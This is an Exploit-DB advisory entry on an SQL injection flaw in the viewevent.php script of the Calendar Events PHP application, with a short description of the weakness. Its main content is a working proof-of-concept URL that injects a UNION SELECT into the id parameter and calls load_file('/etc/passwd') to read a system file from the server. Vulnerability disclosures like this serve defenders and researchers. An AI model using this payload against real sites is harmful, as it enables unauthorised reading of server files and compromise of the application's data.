Dale Mooney Calendar Events - 'Viewevent.php' SQL Injection

EDB-ID:

30533


Author:

s0cratex

Type:

webapps


Platform:

PHP

Date:

2007-08-27


source: https://www.securityfocus.com/bid/25456/info

Calendar Events is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

http://www.example.com/viewevent.php?id=-1' union select 1,load_file('/etc/passwd'),1,1/*